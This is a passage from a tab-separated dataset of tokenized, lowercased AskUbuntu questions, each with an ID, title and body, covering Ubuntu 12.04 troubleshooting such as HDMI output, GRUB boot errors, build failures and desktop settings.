hangup jun 17 12:55:34.463 pppd [ 2711 ] : connection terminated . jun 17 12:55:34.474 ipsec_setup : stopping openswan ipsec ... jun 17 12:55:34.482 pppd [ 2711 ] : exit . jun 17 12:55:35.587 ipsec_setup : error : module xfrm4_mode_transport is in use jun 17 12:55:35.665 ipsec_setup : error : module esp4 is in use i 've had this problem since ubuntu 11.10 though i can easily connect to the server from windows . i use ubuntu 12.0 64-bit .
151990	arabic keyboard code 12.04	i saw this typing in hebrew with lubuntu on askubutu.com . i need to know what the arabic language keyboard code ?
151997	dell inspiron hdmi not working	my machine is a dell make and the model is inspiron-n5110 it has a nvidia 540m graphics card in it . i can not connect my laptop to the tv via hdmi and i tried installing bumblebee , nvidia-current , but no success so far . any one with the same issues , please help
151998	why ca n't i gpg-sign the ubuntu code of conduct ?	so i 've spent quite some time trying to sign this code of conduct and am on the verge of abandoning it . got right to the sign the txt file stage https : //launchpad.net/codeofconduct/1.1/+sign but now i get an error and am just tired of fighting with ubuntu . it has to do with the clearsign thing in the terminal . see below $ gpg -- clearsign ubuntucodeofconduct-1.1.txt you need a passphrase to unlock the secret key for user : `` leon gert marincowitz ( for launchpad ) < lmarincowitz @ gmail.com > '' 2048-bit rsa key , id 715fbc94 , created 2012-06-16 gpg : ca n't open `ubuntucodeofconduct-1.1.txt ' : no such file or directory gpg : ubuntucodeofconduct-1.1.txt : clearsign failed : file open error
151999	video codec error	i have noticed on some videos that when i play some unusual video formats i always see this message . can someone please give me instructions how to resolve this issue ? which codec do i need to install to get rid of this ?
152001	how can i get octal file permissions from command line ?	there is a chmod command to set file permissions , but can i get file permissions in octal mode ( such as 755 ) from the command line ?
152004	boot-repair commands not found in path or not executable	i recently had problems with my ubuntu partition ( after the battery died ) , i managed to fix them by running ubuntu from usb and run gparted . it worked i can access my files on the partition by running ubuntu from usb . but when i restart the computer , after selecting ubuntu in grub , i get a black screen with a white underscore . i googled the problem , and tried to solve it by setting nomodeset , but it did n't work . next i wanted to try to fix grub using boot-repair , i clicked on 'recommended repair ' , it tells me to type the following commands in the terminal : sudo chroot `` /mnt/boot-sav/sda5 '' apt-get install -fy sudo chroot `` /mnt/boot-sav/sda5 '' dpkg -- configure -a sudo chroot `` /mnt/boot-sav/sda5 '' apt-get purge -y -- force-yes grub-common but when running the second command , i get this error : dpkg : warning : 'sh ' not found in path or not executable . dpkg : warning : 'rm ' not found in path or not executable . dpkg : warning : 'tar ' not found in path or not executable . dpkg : error : 3 expected programs not found in path or not executable . note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin . i did n't edit /etc/environment ( or any other files ) , this is what it looks like : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' running_under_gdm= '' yes '' ( i also tried this with the boot-repair cd , but it gave the same errors ) i have no idea how to fix this . i 'm running dualboot ubuntu 12.04 and windows 7 , windows boots fine .
152006	dell latitude e6420 in-built microphone not working	i 'm running with ubuntu 12.04 64bit on dell latitude e6420 . the inbuilt microphone is not working , and is not listed on the sound settings dialog . according to lspci , the device is : 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) i 've also looked at alsamixer , and can see a `` mic '' and `` dock mic '' but fiddling with these and increasing to max amplification does n't appear to change anything . note : i 've raised a certification question on the same topic here : https : //answers.launchpad.net/ubuntu-certification/+question/200678
152009	what is the gnome-open analog on xfce desktop ?	in gnome , there 's a handy command line utility gnome-open , that opens a specified file the same way it would be opened by the double click . is there anything similar for xfce ?
152012	building/installing required a52 plugin	i am trying to compile and install the a52 plugin following the instructions from here : https : //help.ubuntu.com/community/digitalac-3pulseaudio this worked on ubuntu 11.10 but gives me some errors when i try to compile the plugin on ubuntu 12.04 . i 've searched for a solution however i could n't find much on this topic in general , not to talk about a solution . i would really appreciate some help on this : bogdan @ bogdan-desktop : ~ $ cd ~/tmp/ bogdan @ bogdan-desktop : ~/tmp $ cd alsa-plugins-1.0.25/ bogdan @ bogdan-desktop : ~/tmp/alsa-plugins-1.0.25 $ make make all-recursive make [ 1 ] : entering directory `/home/bogdan/tmp/alsa-plugins-1.0.25' making all in oss make [ 2 ] : entering directory `/home/bogdan/tmp/alsa-plugins-1.0.25/oss' /bin/bash ../libtool -- tag=cc -- mode=compile gcc -dhave_config_h -i . -i.. -wall -g -i/usr/include/alsa -g -o2 -mt ctl_oss.lo -md -mp -mf .deps/ctl_oss.tpo -c -o ctl_oss.lo ctl_oss.c ../libtool : line 831 : x -- tag=cc : command not found ../libtool : line 864 : libtool : ignoring unknown tag : command not found ../libtool : line 831 : x -- mode=compile : command not found ../libtool : line 997 : *** warning : inferring the mode of operation is deprecated . : command not found ../libtool : line 998 : *** future versions of libtool will require -- mode=mode be specified . : command not found ../libtool : line 1141 : xgcc : command not found ../libtool : line 1141 : x-dhave_config_h : command not found ../libtool : line 1141 : x-i . : command not found ../libtool : line 1141 : x-i.. : command not found ../libtool : line 1141 : x-wall : command not found ../libtool : line 1141 : x-g : command not found ../libtool : line 1141 : x-i/usr/include/alsa : no such file or directory ../libtool : line 1141 : x-g : command not found ../libtool : line 1141 : x-o2 : command not found ../libtool : line 1141 : x-mt : command not found ../libtool : line 1141 : xctl_oss.lo : command not found ../libtool : line 1141 : x-md : command not found ../libtool : line 1141 : x-mp : command not found ../libtool : line 1141 : x-mf : command not found ../libtool : line 1141 : x.deps/ctl_oss.tpo : no such file or directory ../libtool : line 1141 : x-c : command not found ../libtool : line 1192 : xctl_oss.lo : command not found ../libtool : line 1197 : libtool : compile : can not determine name of library object from ` ' : command not found make [ 2 ] : *** [ ctl_oss.lo ] error 1 make [ 2 ] : leaving directory `/home/bogdan/tmp/alsa-plugins-1.0.25/oss' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/bogdan/tmp/alsa-plugins-1.0.25' make : *** [ all ] error 2 bogdan @ bogdan-desktop : ~/tmp/alsa-plugins-1.0.25 $
152017	keyboard-shortcut key-press-detection sensitivity settings	last week i switched from ubuntu 10.10 to 12.04 and after setting up my keyboard shortcuts , e.g. , ctrl+alt+e for my favorite editor and ctrl+alt+x for the terminal , i noticed that the behavior when pressing the appropriate keys changed somehow . i know this is very subjective and i am not 100 % percent sure if i am suddenly just too lazy when using my keyboard , but here is what i noticed : to run your shortcuts , you usually press the modifiers first and in addition press the alphanum key . now , if i hold the modifiers down very consciously and press the alphanum key afterwards everything works fine . however , i noticed that i may often release the modifiers a bit too early . in ubuntu 10.10 ( metacity/compiz ) my keyboard shortcuts would still execute and my tools would pop up . this does not work anymore in 12.04 . nevertheless , i still believe the old behavior to be more intuitive and would like to have it back . i a nutshell : is there a parameter to control the shortcut-key-press detection behavior ? i already searched the ubuntu keyboard options and searched for `` keyboard '' in gconf-editor but could not find any hints so far .
152020	create a user for sharing purposes only	i want to create simple user , who do n't have any authority to use the system by logging in , but can access the resources shared on the network from a domain . i am under an impression that samba user need an ubuntu user to run . so , i am not sure , if this is exactly what i want as well . how to create such users ?
152026	how can i simultaneous login to all the virtual terminals ?	this is a ubuntu 12.04 minimal install . when i scroll across these 6 terminals using ctrl+alt+f1 through ctrl+alt+f6 , i have to independently login each of them ; one-by-one . is their any way out that i may login to all of these 6 terminals in one go ? ?
152027	can i develop an `` existing '' application for the showdown ?	i want to develop an app for the new ubuntu 's contest , but i have two questions : can i develop an `` existing '' app , which i added to launchpad some days ago , but which no source code was uploaded ? can i use external programs , such qemu or wget to develop them ? for example , calling them with things like os.system ( ) .
152031	compiling a software with gtk which has no configuration script	i bumped into green , a pdf viewer for the framebuffer . i would like to compile it , but i am not having much success , although i have installed all the dependencies ... the error i am getting is : $ /home/data/software/green-0.2 $ make cc -d green_sysconfig_file=\ '' /usr/local/etc/green.conf\ '' -d green_userconfig_file=\ '' .green.conf\ '' -os -wall -c main.c $ ( pkg-config poppler-glib -- cflags ) -o main.o cc -os -wall -c green.c $ ( pkg-config poppler-glib -- cflags ) -o green.o cc -os -wall -c sdl.c $ ( pkg-config poppler-glib -- cflags ) $ ( sdl-config -- cflags ) -o sdl.o sdl.c : in function ‘getinput’ : sdl.c:91:3 : warning : case value ‘37’ not in enumerated type ‘sdlkey’ [ -wswitch ] sdl.c:85:3 : warning : case value ‘123’ not in enumerated type ‘sdlkey’ [ -wswitch ] sdl.c:86:3 : warning : case value ‘125’ not in enumerated type ‘sdlkey’ [ -wswitch ] sdl.c:94:3 : warning : case value ‘126’ not in enumerated type ‘sdlkey’ [ -wswitch ] sdl.c:90:3 : warning : case value ‘4294967207’ not in enumerated type ‘sdlkey’ [ -wswitch ] sdl.c : in function ‘renderpage’ : sdl.c:120:2 : error : unknown type name ‘gdkpixbuf’ sdl.c:120:2 : warning : implicit declaration of function ‘gdk_pixbuf_new’ [ -wimplicit-function-declaration ] sdl.c:120:34 : error : ‘gdk_colorspace_rgb’ undeclared ( first use in this function ) sdl.c:120:34 : note : each undeclared identifier is reported only once for each function it appears in sdl.c:136:2 : warning : implicit declaration of function ‘poppler_page_render_to_pixbuf’ [ -wimplicit-function-declaration ] sdl.c:137:2 : warning : implicit declaration of function ‘gdk_pixbuf_get_pixels’ [ -wimplicit-function-declaration ] sdl.c:137:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] sdl.c:138:2 : warning : implicit declaration of function ‘gdk_pixbuf_get_rowstride’ [ -wimplicit-function-declaration ] sdl.c:139:2 : warning : implicit declaration of function ‘gdk_pixbuf_get_n_channels’ [ -wimplicit-function-declaration ] sdl.c : in function ‘green_sdl_main’ : sdl.c:402:21 : warning : variable ‘left_y’ set but not used [ -wunused-but-set-variable ] sdl.c:402:9 : warning : variable ‘left_x’ set but not used [ -wunused-but-set-variable ] make : *** [ sdl.o ] error 1 $ : /home/data/software/green-0.2 $ obviously he ca n't find gdkpixbuf , but this construct is defined in : # ls /usr/include/gdk-pixbuf-2.0/gdk-pixbuf/gdk-pixbuf.h /usr/include/gdk-pixbuf-2.0/gdk-pixbuf/gdk-pixbuf.h when i add to the file sdl.c the following line : # include < gdk-pixbuf/gdk-pixbuf.h > i am `` greeted '' with following error : # make cc -os -wall -c sdl.c $ ( pkg-config poppler-glib -- cflags ) $ ( sdl-config -- cflags ) -o sdl.o sdl.c:20:35 : fatal error : gdk-pixbuf/gdk-pixbuf.h : no such file or directory compilation terminated . make : *** [ sdl.o ] error 1 my question is then , how do i `` convince '' gcc to compile this code ? thanks in advance , oz update : with : # include `` /usr/include/gdk-pixbuf-2.0/gdk-pixbuf/gdk-pixbuf.h '' # include `` /usr/include/gdk-pixbuf-2.0/gdk-pixbuf/gdk-pixbuf-core.h '' # include `` /usr/include/gdk-pixbuf-2.0/gdk-pixbuf/gdk-pixbuf-features.h '' # include `` /usr/include/gdk-pixbuf-2.0/gdk-pixbuf/gdk-pixbuf-enum-types.h '' added to sdl.c i am getting the following errors : : /home/data/software/green-0.2 $ make cc -d green_sysconfig_file=\ '' /usr/local/etc/green.conf\ '' -d green_userconfig_file=\ '' .green.conf\ '' -os -wall -c main.c $ ( pkg-config poppler-glib -- cflags ) $ ( pkg-config gtk+-2.0 -- cflags ) -o main.o cc -os -wall -c green.c $ ( pkg-config poppler-glib -- cflags ) $ ( pkg-config gtk+-2.0 -- cflags ) -o green.o cc -os -wall -c sdl.c $ ( pkg-config poppler-glib -- cflags ) $ ( sdl-config -- cflags ) $ ( pkg-config gtk+-2.0 -- cflags ) -o sdl.o sdl.c : in function ‘getinput’ : sdl.c:101:3 : warning : case value ‘37’ not in enumerated type ‘sdlkey’ [ -wswitch ] sdl.c:95:3 : warning : case value ‘123’ not in enumerated type ‘sdlkey’ [ -wswitch ] sdl.c:96:3 : warning : case value ‘125’ not in enumerated type ‘sdlkey’ [ -wswitch ] sdl.c:104:3 : warning : case value ‘126’ not in enumerated type ‘sdlkey’ [ -wswitch ] sdl.c:100:3 : warning : case value ‘4294967207’ not in enumerated type ‘sdlkey’ [ -wswitch ] sdl.c : in function ‘renderpage’ : sdl.c:146:2 : warning : implicit declaration of function ‘poppler_page_render_to_pixbuf’ [ -wimplicit-function-declaration ] sdl.c : in function ‘green_sdl_main’ : sdl.c:412:21 : warning : variable ‘left_y’ set but not used [ -wunused-but-set-variable ] sdl.c:412:9 : warning : variable ‘left_x’ set but not used [ -wunused-but-set-variable ] cc main.o green.o sdl.o $ ( pkg-config poppler-glib -- libs ) $ ( sdl-config -- libs ) $ ( pkg-config gtk+-2.0 -- cflags ) -o green sdl.o : in function `renderpage ' : sdl.c : ( .text+0x23c ) : undefined reference to `gdk_pixbuf_new' sdl.c : ( .text+0x283 ) : undefined reference to `poppler_page_render_to_pixbuf' sdl.c : ( .text+0x28b ) : undefined reference to `gdk_pixbuf_get_pixels' sdl.c : ( .text+0x298 ) : undefined reference to `gdk_pixbuf_get_rowstride' sdl.c : ( .text+0x2a4 ) : undefined reference to `gdk_pixbuf_get_n_channels' collect2 : ld returned 1 exit status make : *** [ green ] error 1 my guess is that there is some gcc flag i am missing ? or linking ?
152037	graphics drivers do not show up on system info or additional drivers	so i 've been having problems with a few games since i first switched over to ubuntu about 3 weeks ago ( very much still a noob , yes ) . i fixed a couple bugs with certain games , but on the whole i think it might be that my graphics drivers need an update . my system is running ubuntu 12.04 on a dell studio 1550 with a intel core i5 cpu m 430 @ 2.27ghz ă 4 n and 4 gb ram , graphics card is just a standard intel integrated graphics card , though i am currently unsure of which one . tried to manually find the drivers on intel 's website , but became a bit confused and overwhelmed with the number of links and information thrown at me . my question is , really , can anyone help me to figure out how to download and install the updated drivers ?
152038	accidently blocked access to sudoers.d whilst trying to change ushare config	basically was trying to change the ushare config and needed permissions for some reason so , i changed with sudo -i and in the process did somthing and now i ca n't access superuser to change any of the permissions . also it says /etc/sudoers is mode 0660 , but should be 0440 in the terminal when i try and access it . what can i do ?
152039	system error report - xorg	i am getting this error every time i restart my laptop ( lenovo thinkpad w520 ) . i did a little research before i posting here my question , but i could n't find any answers . can you please help with my problem ? i also received a report of an error which is related with bluetoothd , but unfortunately i do not have a screenshot of the error .
152047	nm-applet icon disappears after connecting in tint2 panel	i am using openbox and my panel of choice is tint2 . everything is working fine with tint2 except nm-applet . problem i am facing is nm-applet icon shows fine when i am not connected to any network but as soon as i get connected to a network it disappears . nm-applet is working because i can still access all its option by right-clicking on it but the icon is invisible . before connecting : after connection : tint2 config file so as you can see in the above two images the icon disappears after the connection is established .
152050	how to make compiz works with ubuntu 12.04 ?	hi , i 've been installing compiz since my first ubuntu version ( 8.04 ) . in each version , there are some issues , but each time i found a solution on the web . this time , it seems that nobody encountered the same issue . i 'm running an ubuntu 12.04 . i installed ccsm , compiz-fusion and configured it for cube with cylinder for 4 screens in line and no column and dăšformer les fenăştre ( in french version or deform windows or something else ) . the problems are the following : when i open a window on full screen , the window is misplaced ( one half on a screen and the other on another ) . moreover , when i click it for the first time , the window move instantly from the screen to an other area of the cube ( the same screen or another ) i tested to remove the `` deform option '' and it works properly , but i love this option , it 's fun to see your window moving from left to right like bubblegum compiz offers a way to open the 4 screens in the same time with alt+ctrl+down ( in the french configuration by default ) but when i try it my computer freezes and it 's very sad . so my question is simple : how to make it works ? my configuration : nvidia geforce 310m with nvidia 's drivers , ubuntu 12.04 ( with unity ) , ccsm and compiz-fusion bye !
152052	ubuntu installation dotted text display	i 'm new to linux and to askubuntu.com . i 'm trying to install ubuntu 12.04 on my desktop pc and at first there 's the black screen . this is solved by the nomodeset option only the next problem i encounter is i get a graphical interface but it 's displayed in a strange way , the colors are off , the top bar is displayed in 2 solid colors , no icons or anything and the text in the menu displays as dots , looks a bit like braille making it impossible to install . i 'm on a intel i5-750 with a ati firegl v7700 video card . i could n't find anything on google about it , i hope someone can help me out .
152059	how to make okular open in predefined screen ?	i hope you can help me in this really painful problem . when i open several pdf from firefox , okular always appears exactly where i am currently working ( trying to open new pdfs ) . this behavior is really annoying as i am forced to put the newly opened pdfs to the right side of the screen before continuing with my work . i think it be really helpful to make okular open either on a certain side ( left oder right ) of the active screen or in another ( inactive ) screen . does anyone know how to do that ?
152066	how can i change the system language to german - even if the system wo n't change the language	yesterday , i have updated my ubuntu 12.04 installation . after a restart , ubuntu chose chinese or some similar as default language . so , all my menus/windows are a mix of english and chinese . previously , i had the german language active . i was able to re-order the language within the language-support . german is now my first option , followed by english and - maybe - chinese . but now , my system is a mix of english ( for the activity screen and the most programs like firefox ) and germen ( only for some the left panel of the gnome-tweak-tool ) . in all settings > > user accounts i have selected german for the language . it seems , that ubuntu ignores all my language settings - it 's still in english . i have also tried , to re-install the language packs , but with no success . any suggestions , to bring my desktop back to the german language ?
152068	how can you make the option `` flat panel scaling '' permanent on an nvidia ion device ?	i am trying to connect an zotac nvidia ion motherboard to my new pioneer a/v through hdmi on a ubuntu machine . while i was fiddling around with the nvidia-settings i managed to make the system work : i went to dfp-1 ( pioneer ... ) in nvidia-settings unchecked `` force full gpu scaling '' in `` flat panel scaling '' switched the hdmi cable over to the a/v presto ! i had sound and video the problem is that if i restart , i lose the image again . and if i switch back to the lcd , i see the `` force full gpu scaling '' is again checked . how can i make this permanent ? i tried adding flatpanelproperties '' `` dfp-1 : scaling = native ; '' , but i must be missing something : when i restart that setting is not applied and nvidia-settings has the checkbox checked . i attach my current xorg.conf file . i appreciate all the help with this ! my xorg.conf file ( the relevant bit ) : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` pioneer electronic corporation vsx-s300 '' horizsync 31.0 - 84.0 vertrefresh 57.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` ion '' # option `` customedid '' `` dfp-1 : /etc/x11/pioneer.edid '' option `` flatpanelproperties '' `` dfp-1 : scaling = native ; '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 # option `` twinview '' `` 0 '' # option `` metamodes '' `` 1920x1080_24 +0+0 ; nvidia-auto-select +0+0 ; 1920x1080_60 +0+0 ; 1280x720 +0+0 '' # subsection `` display '' # depth 24 # endsubsection endsection
152071	how do i make the nautilus sidebar default to tree view ?	yesterday , i just noticed how every time i click on my home folder the sidebar view would go back to its places view instead of the tree view . i tried using this command but it did n't work . is there a way to solve this another way ? gsettings set org.gnome.nautilus.window-state side-pane-view `` tree ''
152072	use image as panel background	i installed ubuntu 12.04 . in the good old days where customizing your ubuntu had no limits it was no big deal to change the background of the panel to an image of your choice . how can i change the panel of my adwaita cupertino unity l theme ? can anyone help me out here ? i 've tried to make the panel transparent . that really did not look very well . its like the autohide of the application menu is just going black when not hovering the menu . so its under the white title of the window
152074	bootloader missing after usb install	i 've tried to install ubuntu 12.04 from usb following the official instructions i created the usb key and started the install . i chose to install ubuntu alongside windows and kept the suggested partitioning scheme . at the end of the install i rebooted and the bootloader is not there and windows boots . i have tried with both universal usb installer ( suggested on the ubuntu site ) and with unetbootin .
152075	sloppy focus not working after upgrade from 11.10 to 12.04	i used sloppy focus in the previous version . where focus would change from window to window on mouse over , but would not raise any window unless clicked . i used this a lot when having two windows and was working on both without having to click the other to do something . or having something full screen and working in a small window , and having the ability to scroll in the full screen app without having to lose the foreground app i was working in . i edited gconf-editor . apps- > metacity- > general- > and unchecked auto_raise . even tried to change the delay to higher . and no change . used gnome-tweak to change from click , mouse , and sloppy . click works as it should . but sloppy and mouse do the exact same thing . so is there a way to get sloppy to work as it should ?
152076	how can i browse ubuntu wiki offline ?	i am accustomed to offline wiki browsing . i thought it would be great if i can read ubuntu wiki in the same way . is there anyway i can read ubuntu wiki offline ? help will be much appreciated if i can download wiki dumps to my computer much like in the case of wikipedia . i already tried suggestions given in this question how can i download archive of ubuntu community documentation so that i can use it offline ? , but using the wget -p -- convert-links -r https : //wiki.ubuntu.com -o logfile gives me html files that are a real pain to browse when offline . please suggest me some other way to do this .
152081	why ca n't i `` shutdown anyway '' if ubuntu one is syncing ?	i use ubuntu 12.04 . my files is small but i ca n't shutdown computer if ubuntu one is syncing even when i force shutdown . that mean when i clicked on shutdown button on the panel , system asked me : ubuntu one is syncing , ca n't shutdown ... lock screen | cancel | shutdown anyway -- -- > i clicked on `` shutdown anyway '' . then shutdown screen appeared and it was counting 1,2 dot but stopped right there . even 1 hour after , nothing is changed . i do n't know why if it is not syncing , i can shutdown computer easily . so , a friend of mine also has the same issue .
152082	can not add additional toolbar buttons in acrobat reader	i can not add additional toolbar buttons in acrobat reader , it says `` only available when document rights are enabled '' ( see the screen-shot bellow ) . i can not highlight texts in pdf documents . i have already set the permission for the document as `` read and write '' . i use ubuntu 12.04 lts and acrobat reader 9 ( installed from ubuntu software centre )
152084	left touchpad button does n't work after upgrade to 12.04	since i installed an upgrade from 11.10 to 12.04 my left button ( touchpad ) doesnt work well . this means i have to log me out via strg/alt/del and log me in again . before i log me out i just can move the mouse , but can not do anz left klick . somewhere i read it has to do something with the xserver and i have to restart , but im a newbie . i own an fujitsu lifebook ah530 and i cant find any touchpad or mouse drivers for it . much greating , jonathan
152087	how do i completly remove ubuntu 12.04 from my laptop ?	i need to delete ubuntu 12.04 from my computer ( windows 7 64 bit ) , is it possible ? how can i delete it ? i cound n't find ubuntu on add or remove programs in windows .
152090	for photography use , is unity is overheating my laptop ? should i try opensuse instead ?	i am a perfect noob here in the linux world . previously was using windows 7 . mine is an hp laptop - intel core2duo t5470 @ 1.60ghz ă 2 / 965gm with 2gb ram . i installed ubuntu 12.04tls and is quite liking it 's display . i really recognized it is 3d before knowing it was unity 3d interface . my uses are image editing , home uses , downloads , browsing etc.. no video-editing/gaming at all . being a photography enthusiast i use image editing programs fairly more . but i am now feeling my laptop is getting a bit overheated - processor and hard-disk . i tried lm-sensor and could not make out much of it . installed xsensors.7 . it gives the same output as lm-sensors gave me . it gives temperature for 4 things > temp1 , temp2 , temp3 , and temp4 . for `` acpitz '' . please guide me in this . however i wanted to ask something more . which one is better for working with images - photography i mean - opensuse 12.1 or ubuntu with unity 3d ? can i get the display quality with the opensuse distribution ? i heard for laptops opensuse uses power more efficiently , is there any truth ? please suggest me whether i should try opensuse or not . if so with which gui ? kde or gnome ? thanks in advance . regards sot
152092	can i continue playing music after suspending my laptop ?	i have a laptop with ubuntu 12.04 , i want to be able to play music with it while it is on hibernate mode , the problem is : when i close my laptop it goes to hibernation mode ( i know this is a default and i know where to change this , but i ca n't change whether the system should play music during hibernation or not ) while i 'm playing music , it stops the music as well ( this too sounds logical because hibernation mode is for saving power ) but i 'd like my computer to continue playing music . is there a possibility of changing this ? if not , can there be an update or something which creates a tiny option in the hibernation or the sound menu for this ?
152093	how do i find out which program is using internet and how much ?	sometimes there are unusual internet activity in my computer . modem 's lights are always blinking and when i open system monitor , i see there some unknown program is using my precious internet with 64kb/s ( i have 512kbps connection ) . still i am in a firefox session with only one tab opened , and the page in already loaded and there is no indication of busy sign in the page ( that rotating orange circle ) . in that situation i unplug my modem and reconnect it again . after several times doing this , that unusual activity stops . it annoys me very much . how can i find out the process which is using the internet ? . how much they are using ? how can i kill it ? a graphical solution will be better .
152102	how can i download windows 7 dvd installers from ubuntu ?	i have rights for a free license of windows 7 , given by my university , and i need it now . according to microsoft 's instructions , to download the windows dvd image i must : download a secure download manager ( sdm ) installer ( its a .pkg file ) run the .pkg file , which should install the sdm download another file ( .sdx ) , run the .sdx file , which should start the download of the windows dvd image . however , the sdm installer ( .pkg ) does not run . the .sdx file , when opened in the text editor , is simply an internet address . when i paste the address in the browser , it goes to the download page , but the download bar remains in 0 % . so , i believe i really must install this sdm first . any help on this problem ? does someone know how to run this .pkg file ?
152103	ubuntu video playback with horizontal lines and other artifacts	ever since ubuntu 7.04 , i 've always had the same problem , the bad playback from my good quality videos ( hd , blue-ray , and others ) . i have used many computers and many different video cards from then but the problems still exist . how can i convince my friends to use this operating system when they need it most for multimedia ( as many people today ) ? in windows ( xp please ! ) i had much better playback . i really was waiting a long time for a solution and is the first time i am writing to you , community , but i think that the only solution is windows 7 . thank you very much for listening me .
152105	how to fix 'grub error file not found ' when installing 12.04 ?	i 'm trying to install ubuntu . i do n't know if it is important , but i 'm trying to install it on external hdd . in the end i have external bootable hdd which only displays : error : file not found grub recovery > from the beginning : i 've downloaded ubuntu-12.04-desktop-i386.iso i 've used lili usb creator ( linuxlive ) to create bootable pendrive from that image i 've bootet from it , it works i 've clicked `` try ubuntu '' , it works too . i 've used gparted to look over drivers ( disks ) my primary embedded disk is seen as /dev/sda my attached external disk as /dev/sdb my pendrive as /dev/sdc i 've created partitions on /dev/sdb fist partition for system ( over 200gib ) second was there already ( it 's xsf , and i do n't want to touch it : p ) third is extended partition , with 1 locital partiton ( 10gib ) for swap i 've started installation i 've choose `` somethin else '' in ... i belive secound screeb then is selected /dev/sdb as boot disk for first partiton of /dev/sdb i set i want ext3 file system , i 've check `` formattin '' checkbox , and mount path set to `` / '' firs logical partiton set as swap partition after installation finished , i restarted my computer . when i boot from my primary disc it 's work ok , my previous operating system - vista - works ok . when i set my bios to boot from my external disc , i only get that message : error : file not found grub recovery > i 've try to reinstall it , but did n't help ... in desperation , i 've try to read a bit about that `` grub recovery > '' command-line and experiment a bit ... i 'm not sure if this has had any point , or if it give you some information ( notice , that i do n't know what i 'm doing : p ) when i 've type command : insmod ( hd1,1 ) /boot/grub/linux.mod i 've get message : unknown filesystem the same with : insmod ( hd1 , msdos1 ) /boot/grub/linux.mod the same with : insmod ext3 but i get no message after command : insmod ext2 ... notice that i really do n't know what this command exactly do , but than i thought that maybe if i reinstall ubuntu with ext2 filesystem , it will work . i 've done that , but symptoms are the same . i 've go back to that live version of ubuntu , filesystem and basics directories seems to be present on /dev/sdb1 ... i 'm completely unfamiliar with grub . i 'm also do n't know which wersion of grub it is , i hope there is only one version on ubuntu-12.04-desktop-i386.iso any help ? thax ======================= edit 17.06.2012 22:05 ========================= this is results.txt from bootinfoscript sda is my in-build hdd sdb is external hdd ( disk-destination for ubuntu ) sdc is pendrive with live ubuntu boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > windows is installed in the mbr of /dev/sda . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdb and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos1 ) /boot/grub on this drive . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdc . sda1 : __________________________________________________________________________ file system : vfat boot sector type : windows 7 : fat32 boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows vista boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sda3 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : according to the info in the boot sector , sda5 starts at sector 63 . operating system : boot files : sdb1 : __________________________________________________________________________ file system : ext2 boot sector type : - boot sector info : operating system : ubuntu 12.04 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sdb3 : __________________________________________________________________________ file system : xfs boot sector type : - boot sector info : mounting failed : mount : /dev/sdb3 : ca n't read superblock sdb4 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sdb5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdc1 : __________________________________________________________________________ file system : vfat boot sector type : syslinux 4.04 2011-04-18 boot sector info : syslinux looks at sector 3250552 of /dev/sdc1 for its second stage . syslinux is installed in the directory . the integrity check of the adv area failed . no errors found in the boot parameter block . operating system : boot files : /syslinux/syslinux.cfg /ldlinux.sys ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 160.0 gb , 160041885696 bytes 16 heads , 63 sectors/track , 310101 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 2,048 20,482,047 20,480,000 1c hidden w95 fat32 ( lba ) /dev/sda2 * 20,482,048 176,771,071 156,289,024 7 ntfs / exfat / hpfs /dev/sda3 176,771,072 312,580,095 135,809,024 f w95 extended ( lba ) /dev/sda5 176,773,120 312,580,095 135,806,976 7 ntfs / exfat / hpfs drive : sdb _____________________________________________________________________ disk /dev/sdb : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 * 2,048 574,773,569 574,771,522 83 linux /dev/sdb3 574,773,570 1,208,315,584 633,542,015 7 ntfs / exfat / hpfs /dev/sdb4 1,208,317,950 1,229,289,471 20,971,522 f w95 extended ( lba ) /dev/sdb5 1,208,317,952 1,229,289,471 20,971,520 82 linux swap / solaris drive : sdc _____________________________________________________________________ disk /dev/sdc : 1971 mb , 1971322880 bytes 129 heads , 40 sectors/track , 746 cylinders , total 3850240 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdc1 * 40 3,850,239 3,850,200 6 fat16 '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/loop1 